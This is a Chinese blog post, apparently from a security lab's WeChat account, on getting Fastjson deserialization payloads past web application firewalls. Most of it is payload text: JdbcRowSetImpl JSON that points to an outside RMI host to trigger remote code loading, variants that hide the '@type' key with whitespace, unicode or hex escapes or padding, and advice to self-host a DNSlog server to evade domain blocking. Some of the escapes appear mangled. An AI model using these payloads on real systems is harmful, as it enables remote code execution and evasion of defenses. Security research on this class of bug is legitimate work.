点击上方“蓝字”,关注更多精彩
bypass waf
近几年waf的是反序列化漏洞头号大敌,面对waf的封禁,我们又该何去何从勒?
利用Fastjson默认会去除键、值外的空格、b、n、r、f等特性,并且还会自动将键与值进行unicode与十六进制解码,扩展出bypass的方法:
原生payload:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
bypass版本
{/s6/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}{n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}{"@type"b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}{"u0040u0074u0079u0070u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}{"x40x74x79x70x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
可应对关键字的封禁。
同理利用特性大包绕也是可能的
{/s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
有一些waf则检测一些域名,比如dnslog的平台,这时候就可以自己搭建dnslog平台,进行测试:
需要准备:
两个域名,或者一个阿里云的域名。vps服务器一台DNSlog项目:
https://github.com/lanyi1998/DNSlog-GO/releases
原文始发于微信公众号(Gamma实验室):Fastjson:我一路向北,离开有你的季节(下)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论